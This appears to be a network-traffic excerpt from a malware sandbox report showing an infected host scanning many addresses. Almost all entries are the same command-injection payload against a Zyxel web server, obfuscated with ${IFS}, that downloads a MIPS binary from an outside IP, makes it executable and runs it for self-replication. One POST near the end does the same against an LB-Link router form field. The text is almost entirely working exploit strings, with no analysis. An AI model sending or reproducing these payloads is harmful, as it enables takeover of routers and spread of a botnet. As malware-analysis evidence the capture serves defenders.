                                                  Jan 19, 2024 18:24:08.310971975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7547192.168.2.1351866168.157.242.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310992956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7548192.168.2.1349848180.236.232.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311022043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7549192.168.2.133825432.63.161.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311074972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7550192.168.2.1351606133.111.199.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311100006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7551192.168.2.135766084.69.190.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311144114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7552192.168.2.1360856125.172.85.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311177015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7553192.168.2.135112666.85.46.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311218023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7554192.168.2.135392472.152.54.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311230898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7555192.168.2.136079850.116.24.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311280012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7556192.168.2.13513204.186.105.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311321020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7557192.168.2.1357124170.101.187.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311369896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7558192.168.2.1347064106.174.163.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311392069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7559192.168.2.1351286132.46.56.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311446905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7560192.168.2.1349068194.252.20.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311484098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7561192.168.2.1360256126.162.46.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311542034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7562192.168.2.13397369.108.0.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311563969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7563192.168.2.1333020109.102.243.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311619043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7564192.168.2.1334162144.214.4.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311636925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7565192.168.2.133990854.201.160.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311666965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7566192.168.2.135012269.223.239.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311729908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7567192.168.2.1358342187.116.8.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311757088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7568192.168.2.1354878179.133.12.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311798096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7569192.168.2.1344494192.204.78.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311844110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7570192.168.2.134068627.83.81.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311918020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7571192.168.2.1359972116.221.164.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311943054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7572192.168.2.1353612162.65.55.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.311985970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7573192.168.2.1335890137.104.91.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312031031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7574192.168.2.134932061.242.193.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312067032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7575192.168.2.1335842171.50.55.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312100887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7576192.168.2.1353546169.44.144.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312143087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7577192.168.2.135678470.211.73.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312171936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7578192.168.2.1357516200.197.30.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312223911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7579192.168.2.1356006202.86.3.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312272072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7580192.168.2.135253212.239.8.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312304974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7581192.168.2.1360384117.61.137.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312345028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7582192.168.2.1338458171.68.253.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312383890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7583192.168.2.1357110129.82.245.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312417984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7584192.168.2.135607473.15.93.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312448025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7585192.168.2.1346756128.238.234.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312494040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7586192.168.2.1341508172.241.3.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312526941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7587192.168.2.135358471.8.220.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312577009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7588192.168.2.1353104134.65.154.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312608957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7589192.168.2.1342122187.180.247.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312645912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7590192.168.2.134360275.25.17.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312683105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7591192.168.2.1359914168.79.201.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312716007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7592192.168.2.1348076182.83.81.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312773943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7593192.168.2.135803458.73.119.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312834978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7594192.168.2.1338916111.45.88.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312863111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7595192.168.2.1357932211.245.217.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312897921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7596192.168.2.134882037.21.29.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312943935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7597192.168.2.133665696.161.210.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.312994957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7598192.168.2.133836066.227.83.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.313047886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7599192.168.2.135232666.174.224.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.313075066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7600192.168.2.135894658.68.130.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.313121080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7601192.168.2.1351586148.2.167.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.313155890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7602192.168.2.1336444117.54.74.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.313190937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7603192.168.2.134307844.105.64.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.313240051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7604192.168.2.1343126203.71.60.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.313282013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7605192.168.2.1340814173.103.42.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.313344955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7606192.168.2.1337250106.250.30.1978080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.352833986 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7607192.168.2.1337068119.28.133.858080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.359244108 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
